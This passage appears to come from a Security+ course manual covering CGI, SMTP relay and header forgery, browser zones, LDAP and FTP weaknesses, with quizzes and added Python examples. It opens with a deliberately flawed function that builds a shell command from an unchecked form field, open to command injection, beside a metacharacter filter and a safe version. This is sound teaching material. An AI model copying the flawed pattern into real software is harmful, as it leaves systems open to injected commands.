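SHELL_METACHARACTERS = re.compile(r"[;&|`$<>\\\"'\r\n]")


def unsafe_mail_command(form_body: str) -> str:
    """The flaw: paste the field straight into a shell command.

    Because the HTML form lives on the client, nothing stops a user from
    submitting any value at all, and a ';' in it becomes a second command.
    This function only builds the string; it never runs it.
    """
    send_to = parse_qs(form_body).get("send_to", [""])[0]
    return f"mail {send_to} < /tmp/form_output"


def safe_mail_argv(form_body: str) -> List[str]:
    """Check size and content, then build an argument vector, not a shell line."""
    values = parse_qs(form_body).get("send_to", [])
    if len(values) != 1:
        raise ValueError("send_to must be supplied exactly once")
    send_to = values[0]
    if len(send_to) > MAX_FIELD_LENGTH:
        raise ValueError("send_to is too long")
    if SHELL_METACHARACTERS.search(send_to):
        raise ValueError("send_to contains shell metacharacters")
    if send_to not in ALLOWED_RECIPIENTS:
        raise ValueError("send_to is not an approved recipient")
    # Passing a list to subprocess.run() bypasses /bin/sh entirely, so even a
    # value that slipped past the checks above could not start a second command.
    return ["mail", "-s", "Form submission", send_to]
```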
Do it!
B-3:
2 New applets require the consent of the client to install. True or false?
True
3 __________________ is a programming interface that allows Web servers to perform data manipulation and interact with users.
CGI
4 Which of the following tasks can CGI scripts perform? (Choose all that apply.)
A Search for information
B Embed malicious macros in a document
C Collect client data using forms
D Mail password files to an attacker
5 List two precautions that you should take when running CGI scripts.
Answers might include:
Deploy intrusion detection systems (IDS), access list filtering and screening on the border of the network.
Design and code applications to check the size and content of the input received from the clients.
Create different user groups with different permissions and restrict access to the hierarchical file system based on those groups.
Validate the security of a prewritten script before deploying it in your production environment.
SMTP relay
Explanation
Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global e-mail communications. A mail client (user) communicates with the mail server using the SMTP protocol's TCP port 25 to get e-mail from one place to another. Current versions of SMTP support ASCII and MIME content. With its high utilization across the Internet, SMTP is intentionally designed as a very simple protocol. This also makes it easy to understand and troubleshoot; unfortunately, malicious users can easily exploit this simple design in many ways across the Internet.

SMTP spam
Third-party SMTP relay is used to transfer messages from one server to another via SMTP. A malicious user could exploit this basic concept and try to hide the real origin of a message by using another server as an SMTP relay. In such a scenario, the attacker can use the relay's Internet Mail Service as an agent for unsolicited commercial e-mail (spam), flooding innocent users' mailboxes with many copies of the same message. Spam is an attempt to force messages on people who would not otherwise choose to receive them. Before you can understand how spamming is achieved via SMTP relay, it's important to understand how SMTP functions. The following exchange demonstrates the sending of an e-mail message through the protocol directly, as opposed to a user-friendly e-mail client such as Eudora. You can actually accomplish this by connecting to TCP port 25 of the SMTP server and executing these commands.
HELO mail.example.com
250 mail.anotherexample.com Hello mail.example.com [172.16.35.44], pleased to meet you
MAIL FROM: person1@example.com
250 person1@example.com Sender ok
RCPT TO: person2@anotherexample.com
250 person2@anotherexample.com Recipient OK
DATA
354 Enter mail, end with "." on a line by itself
From:
To:
250 OAA08757 Message accepted for delivery
This transaction takes place between two SMTP servers. The sending server issues the command lines (HELO, MAIL FROM:, RCPT TO:, and DATA); the lines beginning with a three-digit code are responses from the receiving server. The sending server introduces itself as example.com. The receiving server serves the anotherexample.com domain. The MAIL FROM: and RCPT TO: fields indicate the source and the destination of the message. These fields (up until the DATA field) make up the envelope of the message. The DATA field comprises the body of the message as well as the header fields. The key point is that the only variable needed to deliver the message is RCPT TO:; a malicious user can forge the other variables.
CompTIA Security+ Certification
It's important to identify the real origin of a spam mail in order to take the necessary action. An e-mail message typically traverses at least two SMTP servers (the sender's and the receiver's SMTP servers) before reaching the destination client. As messages travel to their destination, they get stamped by the intermediate SMTP servers along the way. The stamps generate useful tracking information that can be observed in the mail headers. Careful examination of these mail headers can go a long way in identifying the real source of spam mail. The following text is a typical Received: header from an e-mail message:
From forged-address@example.com
Received: from example.com ([172.16.35.44]) by mail.anotherexample.com (8.8.5) for <receiver@anotherexample.com>
Although such messages do not raise any alarms per se, careful examination of them could unveil mismatches between the IP addresses and the domain names indicated in the header. You can verify this by executing a reverse DNS lookup to find the domain name that corresponds to the indicated IP address. For instance, in the Received: header above, a reverse DNS lookup could reveal that the IP address (172.16.35.44) does not really correspond to the example.com domain. In fact, most modern mail programs have already incorporated this functionality, which generates a Received: header that includes the identity of the attacker.

Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that might no longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent organizations can be subject to blacklisting due to problems caused by SMTP relay. This might in turn prevent an organization from communicating with other organizations. There are institutions, such as the Open Relay Behavior-Modification System (ORBS) and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and testing of e-mail servers configured for SMTP relay. These institutions maintain Realtime Blackhole Lists (RBL) of mail servers with problematic histories. Being blacklisted by these types of organizations can adversely affect a business's operations.

Safeguards
Companies might configure their systems so that any mail coming from blacklisted mail servers is automatically rejected.
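The relay decision a receiving server should make on RCPT TO: (the one field that must be genuine) and the Received: header check described above, as one added Python example that is not part of the course manual. It serves both the SMTP transaction and the header-examination passages; the local domain, trusted network, blackhole entry and reverse-DNS table are constructed stand-ins for DNS and an RBL feed.

```python
"""Added example (not from the course manual): the two checks the text
describes for a receiving SMTP server. Networks, hosts and the reverse-DNS
table are constructed; a real server would query DNS and an RBL feed."""

import ipaddress
import re
from typing import Optional, Tuple

# Constructed configuration for the receiving server, mail.anotherexample.com.
LOCAL_DOMAINS = {"anotherexample.com"}
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]      # our own mail clients
BLACKLISTED = {ipaddress.ip_address("192.0.2.77")}       # from an RBL feed (constructed)


def relay_decision(client_ip: str, mail_from: str, rcpt_to: str) -> Tuple[int, str]:
    """Reply code and text for a RCPT TO: command.

    Only RCPT TO: has to be genuine for delivery, so the policy is built on
    it; MAIL FROM: is accepted but never trusted, because it can be forged.
    """
    ip = ipaddress.ip_address(client_ip)
    if ip in BLACKLISTED:
        return 550, "Service unavailable; client is on a blackhole list"
    rcpt_domain = rcpt_to.rpartition("@")[2].lower()
    if rcpt_domain in LOCAL_DOMAINS:
        return 250, f"{rcpt_to} Recipient OK"      # inbound mail for our users
    if any(ip in net for net in TRUSTED_NETS):
        return 250, f"{rcpt_to} Recipient OK"      # our users sending outbound
    return 550, "Relaying denied"                  # third-party relay: refuse


# Received: from <claimed host> ([<ip>]) by <our host> ...
RECEIVED_RE = re.compile(r"^Received: from (\S+) \(\[(\d+\.\d+\.\d+\.\d+)\]\) by (\S+)")

# Constructed stand-in for reverse (PTR) lookups; real code would use DNS.
REVERSE_DNS = {
    "172.16.35.44": "relay7.somewhere-else.net",
    "10.1.2.3": "mail.example.com",
}


def received_mismatch(header_line: str) -> Optional[str]:
    """Describe the mismatch if the claimed host does not match what the IP
    address resolves to; return None if the stamp is consistent."""
    match = RECEIVED_RE.match(header_line)
    if not match:
        return None                                 # not a stamp of the expected shape
    claimed, ip, _receiver = match.groups()
    actual = REVERSE_DNS.get(ip)
    if actual is None:
        return f"{ip} has no reverse DNS record"
    if actual != claimed and not actual.endswith("." + claimed):
        return f"header claims {claimed}, but {ip} resolves to {actual}"
    return None
```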
B-4:
2 It is possible to forge the MAIL FROM: variable within an SMTP message. True or False?
True
Exhibit 6-5: Internet Options dialog box with the Security tab activated.
Do it!
C-1:
Heres how
1 Switch to Internet Explorer
2 Choose Tools, Internet Options
To set the security level for the zone to Medium. If it is already set to Medium, the Default Level button will be dimmed.
8 Click Close
9 Select Restricted Sites
10 Click Sites
Add the following Web sites to the zone:
www.kazaa.com
ftp.microsoft.com
To configure Restricted Sites to block file downloads in Microsoft Internet Explorer 6.
11 Click Close
12 Click OK
13 In the Internet Explorer Address box, enter www.kazaa.com
14 Enter ftp.microsoft.com
Navigate to /Reskit/win2000
15 Right-click ADSizer.exe
Select Copy to Folder
A security alert appears. URLs can be redirected, so this is not the best way to block file downloads.
To close the Internet Options Window.
Notice the Restricted sites icon in the lower right corner of the browser.
Kazaa completely fails to load.
In the browser's Address field.
Do it!
C-2:
2 Which of the following is a zone that contains Web sites that could potentially cause damage to your system? (Choose all that apply.)
3 Which of the following is a zone that contains Web sites that you believe will not cause damage to your system?
Privacy settings
Explanation
One issue many users have with Web browsing is the fact that anyone on the Internet has the ability to write information to their computer's hard drive. One example of this ability is the use of cookies. Cookies can be valuable to both the user and the company that deposits them. For example, if you go to an e-commerce site and fill out a form with all your important data, a cookie can be used to remember you. This is helpful because you'll not have to enter the data every time you visit the site. While this capability can be very helpful, it can also be a major security risk. With that cookie on your computer, anyone with access to your computer could go to the e-commerce site and purchase goods without your knowledge.
Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies to a selected site
Do it!
C-3:
Heres how
1 Launch Internet Explorer
2 Choose Tools, Internet Options
3 Activate the Privacy tab
Slide the Settings bar up to High
4 Click Edit
5 In the Address of Web Site box, type www.yahoo.com
6 Click Allow
Click OK
7 Click OK
Notice that only the domain is added to the Managed Web sites list.
To block cookies that do not comply with the W3C P3P.
To add Web sites you want to allow to bypass the settings.
8 In the Address box of your browser, enter www.msn.com
9 In the Privacy message, click OK
Double-click the cookie privacy warning in the toolbar
10 Click Close
11 In the Internet Explorer Address box, enter www.yahoo.com
12 Choose Tools, Internet Options
Notice the privacy warning is absent.
Do it!
C-4:
Reviewing cookies
2 Which of the following Privacy settings will block all cookies without a Compact Privacy Policy?
3 Which of the following Privacy settings is likely to cause some Web pages to fail to load? (Choose all that apply.)
A Block all cookies
B High
C Medium high
D Medium
E Low
F Accept all cookies
Do it!
C-5:
Heres how
1 Activate the Advanced tab
Scroll down to the Security section and review the settings
2 Activate the Content tab
3 Click AutoComplete
Clear Usernames and passwords on forms
To close the AutoComplete Settings window.
To close the Internet Options window.
C-6:
A Do not save encrypted file to disk
B Empty Temporary Internet Files folder when browser is closed
C Use Fortezza
D Do not save Certificates to disk
2 When you enable the option Empty Temporary Internet Files folder when your browser is closed, it also deletes all cookies. True or false?
False: It does not affect the cookies.
Review questions
1 Signing applets is a technique of adding a _________ __________ to an applet to prove that it came unaltered from a particular trusted source.
digital signature
Sandbox restrictions might prevent the applet from performing required operations on local system resources. True or false?
True
In order to use SSL security in a Web page transaction, what must be used in the Web page URL?
HTTPS
__________________ is an interface specification that allows communications between client programs and Web servers.
CGI
Directory services
Explanation
A directory service provides a database for inventory and administration of every object on the network. The directory service performs the following functions:
- Records and organizes information about every user account, server, printer, workstation, and file system on the network.
- Grants users access to applications, files, printers, and other network services anywhere on the network with a single login sequence.
- Enables the LAN Administrator to track the location and disposition of all network resources.
Information gathered for each network resource is stored as an object in the database. Users can query the database using a broad set of criteria (such as name, type of service, or location).
LDAP
Lightweight Directory Access Protocol (LDAP) is a commonly used directory service protocol created by the Internet Engineering Task Force (IETF). It was originally designed to work as a front-end client for X.500 directory services (an ISO and ITU standard that defines how global directories should be structured). X.500 requires the full OSI protocol stack and significant computer resources to operate. In response, LDAP was redesigned as a stripped-down version of X.500. LDAP offers the following features:
- Hierarchical database structure follows X.500 standards
- Extensible for use with any X.500-compatible database
- Provides authentication and authorization services
- Easily deploys on any client or server
- Runs over TCP/IP networks
- Supports most operating systems (platform-independent)
LDAP's key advantage is that it's a versatile directory system that is standards-based and platform-independent. This has caused LDAP to proliferate to nearly all operating systems and has caused the protocol to be widely adopted for a variety of networking applications (see the following table for a sample of major players in the LDAP market). This protocol runs on TCP/IP, so it can be deployed on most networks.
LDAP framework
An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1. The diagram portrays an inverted tree, with its root at the top and branches extending out from the root. The branches are classified as containers since their sole purpose is to hold or contain other objects. The most elemental units are called leaf objects. Each leaf on the tree describes a single network resource, such as a computer, printer, user, or file system directory.
Directory and file transfer services
The following table describes each level of the tree structure:
Level: [Root]
At the top of this inverted tree is the [Root]. Like the root of the file directory tree, this is the highest level you can go within the LDAP structure. The [Root] is created during installation of the first LDAP server on the network and cannot be moved, deleted, or renamed. The Directory tree can have only one [Root].
Level: Country
The Country object, an optional object representing the country of the network, is positioned directly beneath the [Root] object.
Level: Organization
The next level contains an object called the Organization. The Organization is classified as a container, since its sole purpose is to hold or contain other objects. Organizations typically represent a company or department and are used to store other objects. Every tree must have at least one Organization.
Level: Organizational Unit
Beneath the Organization is another container called the Organizational Unit. Organizational Units typically represent a division, department, workgroup, or project team, and can contain other Organizational Units or leaf objects. Organizational Units are optional in the LDAP hierarchy.
Level: Leaf Objects
Leaf objects are the most elemental unit in the LDAP tree. Each leaf on the tree describes a single network resource. The Directory tree represents each leaf object with an icon that shows what type of resource it is and how it is named.
Each entry in the directory has a distinguished name (DN) and its own attributes, each followed by specific values. Each distinguished name must be unique throughout the LDAP directory because it identifies a single network object. An example of the DN of an entry (an individual) stored in an LDAP directory is:
cn=Jonathan Q Public, ou=Information Security Department, o=XYZ Corp, c=United States
Using the following table you can decode the fields in the DN. Jonathan Q Public is the common name of the individual who works in the Information Security Department of XYZ Corp., which is headquartered in the United States.
Abbreviation   Description
DN             Distinguished name
CN             Common name
OU             Organizational unit
O              Organization
C              Country
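Splitting a DN into its components, checking that it follows the hierarchy the level table describes, and composing one (as the exercise that follows asks), as an added Python example that is not part of the course manual. It assumes the backslash-escaped comma convention of LDAP string DNs, so a value that itself contains a comma stays in one piece; the directory contents are constructed.

```python
"""Added example (not from the course manual): splitting, validating and
composing distinguished names in the X.500 layout the table describes.
The directory contents used here are constructed."""

from typing import List, Tuple

# Attribute types from the table, ranked root (0) to leaf (3).
LEVEL = {"c": 0, "o": 1, "ou": 2, "cn": 3}
DESCRIPTION = {"cn": "Common name", "ou": "Organizational unit",
               "o": "Organization", "c": "Country"}


def split_dn(dn: str) -> List[Tuple[str, str]]:
    """Split a DN into (type, value) pairs, leaf first.

    A comma separates RDNs unless it is preceded by a backslash, so a value
    such as 'Public\\, Jonathan' stays in one piece.
    """
    rdns, current, escaped = [], [], False
    for ch in dn:
        if escaped:
            current.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            rdns.append("".join(current))
            current = []
        else:
            current.append(ch)
    if escaped:
        raise ValueError("DN ends with a dangling backslash")
    rdns.append("".join(current))
    pairs = []
    for rdn in rdns:
        attr, sep, value = rdn.partition("=")
        if not sep or not attr.strip() or not value.strip():
            raise ValueError(f"malformed RDN: {rdn!r}")
        pairs.append((attr.strip().lower(), value.strip()))
    return pairs


def valid_hierarchy(pairs: List[Tuple[str, str]]) -> bool:
    """Enforce the tree the table describes: a single cn leaf, under zero or
    more ou containers, under exactly one o, under at most one c."""
    types = [attr for attr, _ in pairs]
    if any(attr not in LEVEL for attr in types):
        return False
    if types.count("cn") != 1 or types.count("o") != 1 or types.count("c") > 1:
        return False
    if types[0] != "cn":
        return False
    ranks = [LEVEL[attr] for attr in types]
    # Reading leaf to root, every step must stay level or move toward the root.
    return all(here >= nxt for here, nxt in zip(ranks, ranks[1:]))


def compose_dn(pairs: List[Tuple[str, str]]) -> str:
    """Build a DN, escaping commas (and backslashes) inside values."""
    def escape(value: str) -> str:
        return value.replace("\\", "\\\\").replace(",", "\\,")
    return ",".join(f"{attr}={escape(value)}" for attr, value in pairs)


def decode_dn(dn: str) -> List[Tuple[str, str]]:
    """Label each component with the description from the table, as the text does."""
    return [(DESCRIPTION.get(attr, attr), value) for attr, value in split_dn(dn)]
```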
Countermeasures
Extra steps must be taken to secure the LDAP server, including:
- Apply the latest operating system and application security patches.
- Remove unneeded services and applications that could potentially present an exploitable vulnerability.
- Configure strong authentication using Kerberos for LDAP v2 or SASL for LDAP v3.
- Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.
Do it!
A-1:
Grants users access to applications, files, printers, and other network services anywhere on the network with a single login sequence.
Enables the LAN Administrator to track the location and disposition of all network resources.
6 Provide the distinguished name for the following leaf object: Company: Emerald Consulting Department: Information Services Volume: UNIX401_SYSTEM
cn=UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting
7 SSO is an authentication process in a client/server environment where a user can enter a single username and password and obtain access to more than one application or network resource. True or false?
True
8 What are some major types of attacks LDAP servers must be secured against? (Choose all that apply.)
FTP
Explanation
It is obvious to most people who have downloaded files over the Internet that the ability to share programs and data with other people around the world is an essential aspect of the Internet that continues to drive its explosive growth. This is why file transfer is so critical to today's networked organizations. An often-overlooked aspect of this is the security and integrity of the typically secret data that businesses need to exchange over the Internet. As incredible and wonderful as the Internet might be, it's a wild and uncontrolled network and poses a number of risks to your business's data.

One of the most commonly used application protocols on the Internet is File Transfer Protocol (FTP). It's also one of the most insecure services in use. The reason it is so commonly used is that most FTP clients and servers are free, distributed with most operating systems, and relatively easy to use. System administrators can easily exchange files with remote offices and business partners over the Internet by setting up an FTP server in a matter of minutes and with no additional cost. The list of vulnerabilities and attacks associated with FTP is a long one. FTP was one of the early TCP/IP applications and was designed without the security features of many current applications. To understand FTP's inherent flaws, one must first understand the mechanism by which FTP authenticates and transfers data between a client and a server. FTP has two standard data transmission methods: active FTP and passive FTP. The terms active and passive refer to the server's role in setting up the TCP session, as shown in Exhibit 7-2.
In both active and passive FTP, the client initiates a TCP session using destination port 21 on the server. This is the command connection, and it is used for authenticating the user and transferring commands between the client and the server. The command connection operates just as a normal TCP session should: the client initiates a session using a predetermined destination port number on the server (for FTP, this is port 21) and a source port that is a number greater than 1023. The differences in how the two types of FTP operate are in the data connection that is set up when the user wants to transfer data between the two machines. For example, if the user issues FTP's GET command to download a file (the command might take the form get resume.doc to download the file resume.doc), the client sends the get command over the command connection, and then the server negotiates the opening of a second TCP connection to actually transfer the file's data.

Active FTP

In active FTP, which is FTP's default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. This is contrary to TCP's normal operation, in which the destination port of a new session is fixed and the source port is a random high port above 1023. Active FTP is an issue because security best practices dictate that connections can be initiated outbound from a trusted network to an untrusted network, but not vice versa. In a situation in which the client sits behind a firewall on an internal trusted network and the server is out on the Internet, active FTP breaks this policy: it requires that the server initiate a connection inbound to the client to transfer data, as shown in Exhibit 7-3.
Exhibit 7-3: Setup of active FTP data connection

Most modern stateful firewalls accommodate this issue by actually watching the negotiation between the client and server and automatically opening the agreed-upon port so the client can receive the connection from the server. Simple packet-filtering firewalls do not have this level of intelligence. To permit active FTP through a packet-filtering firewall, one must allow all high ports (because one never knows what port will be negotiated by the client and server) to reach internal clients from outside the trusted network, a very dangerous proposition. The situation can be slightly mitigated by only allowing incoming connections from port 20, but people seeking to exploit this weakness could easily craft packets from that port as well.
CompTIA Security+ Certification

Passive FTP

In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because it's only accepting a connection instead of originating one). As shown in Exhibit 7-4, the passive FTP client initiates the data connection to the server with a source and destination port that are both random high ports.
Exhibit 7-4: Setup of the passive FTP data connection

This solves the firewall issue just mentioned, because the client initiates both connections, so the client does not violate his own security policy by allowing an inbound connection from the Internet. This opens up a security issue for the FTP server, however: now the server must allow inbound connections on all high ports in order to accommodate passive FTP data connections. Most stateful firewalls accommodate this by monitoring the control connection to determine which port is used for the data connection, and then opening that single port between the server and the client. The same issue exists for packet-filtering firewalls, which are not equipped to look that deeply into the FTP packet; a packet-filtering firewall that is protecting the active FTP server has to be configured to accept all ports to the server in order to accommodate passive FTP.
Clear text authentication and data transmission
Another vulnerability lies in the fact that FTP traffic is sent unencrypted, in clear text. This includes both the username/password pair and the data itself. Anyone with a packet sniffer can obtain a copy of the data transferred via FTP, as well as the login information used to obtain it.

Glob vulnerability

A nonstandard issue with many FTP implementations is that they permit the client to use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a user to perform an operation on multiple files at once. For example, the command del ap* causes the files application.doc and apple.pic to be deleted. Hackers can exploit this behavior to create buffer overflows and therefore gain control of the server. This is called the glob vulnerability.

Software exploits and buffer overflow vulnerabilities

There are many known vulnerabilities associated with various implementations of FTP. For example, a well-documented buffer overflow vulnerability in wu-ftp (a common FTP server implementation) has been responsible for thousands of compromised UNIX and Linux boxes.

Anonymous FTP and blind FTP access

The practice of setting up anonymous FTP servers across the Internet is extremely common. This originates with an FTP server's default position of allowing anyone authenticating with the username anonymous and any password (good Netizens use their e-mail address as the password) access to a directory on the server. This practice allowed people around the world to easily share data and files without too much overhead or red tape. Many software vendors set up anonymous FTP sites to distribute updates and patches for their products. FTP search engines exist that make finding thousands of anonymous FTP sites quick and easy. The transcript below is from an anonymous FTP session. Information entered by the user appears in bold typeface:
C:\ >ftp leech.stat.umn.edu
Connected to leech.stat.umn.edu.
220 leech.stat.umn.edu FTP server (Version wu-2.4.2academ[BETA-18](1) Thu Sep 2 GMT 2001) ready.
User (leech.stat.umn.edu:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Please read the file README
230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024 days ago
230 Guest login ok, access restrictions apply.
ftp>
In the first line of this transcript, the user issued a command to run the FTP client and connect to the site called leech.stat.umn.edu. The user could just as easily have entered the server's IP address. In the second line, you see the connection was successful, and in the following line, the FTP server has provided some basic information about itself. It's running version 2.4.2 of wu-ftp. The server immediately provides the User prompt so the user can log on to it.
Here you see the user provided the login of anonymous to get access with visitor privileges. The server has been configured to accept the anonymous login account; it requests that the user provide his or her e-mail address as a password, although any string of characters is often accepted by anonymous FTP servers. After the password was entered, the server printed a brief banner message instructing the guest to read the file README. You know the anonymous user credentials were accepted because the server noted Guest login ok. Finally, you see the ftp> prompt, indicating the user is now able to enter an FTP command.

Although properly secured and monitored anonymous FTP sites are a valuable and well-used Internet resource, unmonitored anonymous FTP servers can often be used as storehouses for warez (pirated software with the copy protection mechanisms removed). Pirates use anonymous FTP sites for storage because they often have more bandwidth than their own Internet connections, making it easy to share and trade their warez. Companies that do not monitor their anonymous FTP sites for this type of behavior risk a black eye in the public relations arena if it becomes known that their servers are used for this type of illegal activity.

A potentially worse situation could arise if the anonymous account is not properly restricted to access only designated directories. If an anonymous FTP server is misconfigured and permits anonymous visitors to write to any directory, then malicious visitors could upload files that would result in their gaining root access and control of the server. Even if the malicious user could only read any directory, he could download files containing user passwords and decrypt them using password cracking tools. If you decide to set up an anonymous FTP server, be sure it's properly secured. CERT provides a document entitled Anonymous FTP Configuration Guidelines to help in this task. It is available at:
www.cert.org/tech_tips/anonymous_ftp_config.html.
A variant of the anonymous FTP site is a blind FTP site. With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. Blind FTP sites offer more security than anonymous sites, because the user must know the exact filename of a desired file in order to download it. There is still no way to account for who has logged on to the server and accessed a given file. If a user who is given a particular filename by an administrator chooses to share it with others, then the privacy sought by setting up the blind server is compromised.
FTP countermeasures
It's clear from the aforementioned issues that FTP is an easy target for hackers. There are, however, solutions to the FTP quandary:

Do not allow anonymous access unless a clear business requirement exists to do so.
Employ a state-of-the-art firewall such as a Cisco PIX or Check Point FireWall-1 that performs content inspection of FTP commands.
Ensure your FTP server has the latest security patches and that it has been properly configured to limit user access.
Encrypt your data before placing it on an FTP server, so it cannot be sniffed in transit to its destination. The recipient needs the appropriate keys to decrypt the data once it has been received.
Encrypt the FTP data flow using a Virtual Private Network (VPN) connection.
Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol outlined in the next section.
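The following is an added example (not from the course) that puts the active/passive and clear-text discussions above into code: a small Python inspector that follows the FTP command connection the way a stateful firewall helper does. It decodes the PORT command and the 227 passive-mode reply to derive the single data-connection pinhole, contrasts that with the all-high-ports rule a packet-filtering firewall would need, and records the USER/PASS pair, which is readable by anyone sniffing port 21. The session transcript, addresses and credentials are constructed, and inspect_session and parse_hostport are names chosen here.

```python
import re

# Constructed sample exchange on the FTP command connection (TCP port 21).
# "C" is client -> server, "S" is server -> client. Hosts, ports and the
# password are made up for this example.
SAMPLE_SESSION = [
    ("S", "220 ftp.example.test FTP server ready."),
    ("C", "USER alice"),
    ("S", "331 Password required for alice."),
    ("C", "PASS hunter2"),
    ("S", "230 User alice logged in."),
    ("C", "PORT 192,0,2,10,4,1"),      # active: "connect back to 192.0.2.10:1025"
    ("S", "200 PORT command successful."),
    ("C", "RETR resume.doc"),
    ("S", "226 Transfer complete."),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (198,51,100,7,195,80)."),  # server listens on :50000
    ("C", "LIST"),
    ("S", "226 Transfer complete."),
    ("C", "QUIT"),
]
CLIENT_IP = "192.0.2.10"
SERVER_IP = "198.51.100.7"
HOSTPORT_RE = re.compile(r"(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")


def parse_hostport(text):
    """Decode the h1,h2,h3,h4,p1,p2 form used by PORT and by the 227 reply.

    Returns (ip, port) or None; the port is p1 * 256 + p2, so 195,80 is 50000.
    """
    m = HOSTPORT_RE.search(text)
    if m is None:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def inspect_session(lines, client_ip, server_ip):
    """Follow the command connection the way a stateful FTP helper does.

    Returns the clear-text credentials that crossed the wire and, for each
    negotiated data connection, who opens it, the exact pinhole a stateful
    firewall can open, and the broad rule a plain packet filter needs instead.
    """
    creds = {"user": None, "password": None}
    data_conns, warnings = [], []
    awaiting_pasv_reply = False
    for direction, text in lines:
        verb, _, arg = text.partition(" ")
        verb = verb.upper()
        if direction == "C" and verb == "USER":
            creds["user"] = arg            # visible to anyone sniffing port 21
        elif direction == "C" and verb == "PASS":
            creds["password"] = arg        # likewise sent unencrypted
        elif direction == "C" and verb == "PORT":
            parsed = parse_hostport(arg)
            if parsed is None:             # not a valid h1,h2,h3,h4,p1,p2 argument
                continue
            ip, port = parsed
            if ip != client_ip:            # a helper should refuse a third-party address
                warnings.append(f"PORT names {ip}, not the client {client_ip}")
            data_conns.append({
                "mode": "active",
                "initiator": "server",
                "flow": f"{server_ip}:20 -> {ip}:{port}",
                "stateful_pinhole": f"allow tcp {server_ip}:20 -> {ip}:{port}",
                "packet_filter_rule": (f"allow tcp any:20 -> {client_ip}:1024-65535 "
                                       "(inbound to the client; source port is spoofable)"),
            })
        elif direction == "C" and verb == "PASV":
            awaiting_pasv_reply = True
        elif direction == "S" and verb == "227" and awaiting_pasv_reply:
            awaiting_pasv_reply = False
            parsed = parse_hostport(text)
            if parsed is None:
                continue
            ip, port = parsed
            data_conns.append({
                "mode": "passive",
                "initiator": "client",
                "flow": f"{client_ip}:high -> {ip}:{port}",
                "stateful_pinhole": f"allow tcp {client_ip}:1024-65535 -> {ip}:{port}",
                "packet_filter_rule": (f"allow tcp any:1024-65535 -> {server_ip}:1024-65535 "
                                       "(inbound to the server on every high port)"),
            })
    return {"credentials": creds, "data_connections": data_conns, "warnings": warnings}


if __name__ == "__main__":
    report = inspect_session(SAMPLE_SESSION, CLIENT_IP, SERVER_IP)
    print(f"clear-text login for {report['credentials']['user']!r} readable off the wire")
    for conn in report["data_connections"]:
        print(f"{conn['mode']}: {conn['initiator']} opens {conn['flow']}")
        print(f"  stateful firewall: {conn['stateful_pinhole']}")
        print(f"  packet filter:     {conn['packet_filter_rule']}")
    for warning in report["warnings"]:
        print("warning:", warning)
```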
Do it!
B-1:
Here's how
Students will work in pairs for this activity.
2 Create a folder called ftp located in the root directory of your system
3 Click Start and then right-click My Computer
5 Expand Internet Information Services
7 Right-click FTP Sites and choose New, FTP Site (The FTP Site Creation Wizard will begin.)
8 Click Next
9 Enter My FTP Site and click Next (For the description.)
10 Click Next (To keep the default settings for the IP Address and TCP Port Settings.)
11 Click Next (To accept the default of not isolating users.)
12 In the path box, type c:\ftp (If your root directory is different than c:\, substitute the root directory on your system.)
13 Click Next (The FTP Site Access Permissions screen appears.)
14 Check Write and click Next
(To close the Wizard.) Notice that your ftp site is stopped. To start your ftp server, you'll have to first stop the Default FTP Site in Computer Management.
Requiring authentication
Explanation The default setting for an FTP site is to allow anonymous access; however, there are times when it's necessary to control access. The Windows Server 2003 FTP Server service has capabilities to remove anonymous access and require user authentication. The major risk when switching to authentication is that the usernames and passwords are sent in clear text, which can be sniffed with a protocol analyzer.
Do it!
B-2:
Here's how
1 Switch to the Computer Management window, right-click My FTP Site, and choose Properties
2 Activate the Security Accounts tab
5 Switch to the Command window and enter ftp
6 At the ftp prompt, enter open <your partner's IP address>
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
For the username. For the password. The login will fail because a valid account with a password is required. Anonymous access will no longer be allowed, but there is a risk of having the password sniffed on the network.
9 At the ftp prompt, enter user, then enter user1, then enter the password for the User 1 account
10 Enter quit
Do it!
B-3:
Here's how
1 Switch to the Computer Management window
2 Activate the Directory Security tab
3 Click Add
6 Switch to the Command window and at the ftp prompt, enter open <your partner's IP address>
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
7 At the ftp prompt, enter user1 and enter the password for the User 1 account (To reattempt login. You'll be denied access because your IP address has been denied access.)
8 Enter quit (To end the session.)
9 Close the Command window
10 When both you and your partner are finished testing the ftp connection, return to the Directory Security tab and remove your partner's IP address
11 In Computer Management, stop the My FTP Site and restart the Default FTP Site
Expand Services and Applications, expand Internet Information Services, and expand FTP Sites to stop/start the ftp sites.
12 What are the options available for TCP/IP Access Restrictions? (Choose all that apply.)
A Users can log on using the administrator password
B Users can log on using their password
C Users can log on using an Anonymous account
D Users will not be able to access the server
S/FTP
The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following description of S/FTP: S/FTP is an interactive file transfer program, similar to ftp, which performs all operations over an encrypted ssh transport. It might also use many features of ssh, such as public key authentication and compression. S/FTP connects and logs into the specified host, then enters an interactive command mode.

